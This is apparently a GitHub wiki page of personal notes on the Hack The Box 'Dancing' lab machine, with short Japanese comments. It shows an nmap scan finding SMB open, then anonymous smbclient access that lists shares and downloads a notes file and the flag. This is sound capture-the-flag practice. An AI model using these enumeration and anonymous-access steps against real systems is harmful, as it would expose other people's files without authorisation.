HTB_Dancing - meruneru/tech_memo GitHub Wiki
ใคใณใใญใฎใใทใณ
#ใใผใ445 ใคใพใ #SMB ใ็ฉบใใฆใใใ
โ[htb-meruneru@htb-4ygdk8b8dx]โ[~]
โโโโผ $nmap -sV -sC -Pn 10.129.185.108
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-12 13:54 UTC
Nmap scan report for 10.129.185.108
Host is up (0.078s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4h10m06s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-11-12T18:04:50
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.46 seconds
anonymousใงๅ ฅใใใ
โโ[htb-meruneru@htb-4ygdk8b8dx]โ[~]
โโโโผ $smbclient -L 10.129.185.108
Enter WORKGROUP\htb-meruneru's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
โโ[โ]โ[htb-meruneru@htb-4ygdk8b8dx]โ[~]
โโโโผ $smbclient //10.129.185.108/WorkShares
Enter WORKGROUP\htb-meruneru's password:
Try "help" to get a list of possible commands.
smb: \>
smb: \> ls
. D 0 Mon Mar 29 08:22:01 2021
.. D 0 Mon Mar 29 08:22:01 2021
Amy.J D 0 Mon Mar 29 09:08:24 2021
James.P D 0 Thu Jun 3 08:38:03 2021
smb: \> get Amy.J\worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as Amy.J\worknotes.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> get James.P\flag.txt
getting file \James.P\flag.txt of size 32 as James.P\flag.txt (0.1 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \>